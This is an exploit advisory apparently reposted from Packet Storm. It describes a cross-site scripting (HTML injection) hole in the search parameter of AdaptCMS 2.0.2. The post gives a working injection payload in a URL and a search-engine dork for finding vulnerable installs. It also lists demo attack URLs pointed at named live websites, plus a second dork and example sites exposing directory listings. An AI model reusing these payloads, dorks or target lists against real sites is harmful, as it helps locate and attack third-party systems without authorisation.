AdaptCMS 2.0.2 Cross Site Scripting

2012-06-19T00:00:00
ID PACKETSTORM:113909
Type packetstorm
Reporter indoushka
Modified 2012-06-19T00:00:00

Description

                                        
                                            `===================================================  
AdaptCMS v2.0.2 (XSS/HTML Injection) Vulnerability  
===================================================  
  
# Vendor: http://garr.dl.sourceforge.net/project/adaptcms/AdaptCMS%202.x/2.0.x/AdaptCMS_2.0.2.zip  
  
# Date: 2012-06-06   
  
# Author : indoushka   
  
# Tested on : windows SP2 Francais V.(Pnx2 2.0)  
########################################################################   
  
# Exploit By indoushka   
-------------  
Dork : Copyright 2006-2011 - Insane Visions  
  
http://localhost/Adapt/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E  
  
Demo :  
1- http://www.obras.tuars.com/adapt/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E  
2- http://www.adaptcms.com/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E  
3- http://www.obras.tuars.com/adapt/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E  
  
Directory Listing  
  
Dork: inurl:urllist.txt  
  
1- http://www.bradentoncoins.com/urllist.txt   
2- http://www.adaptcms.com/urllist.txt  
`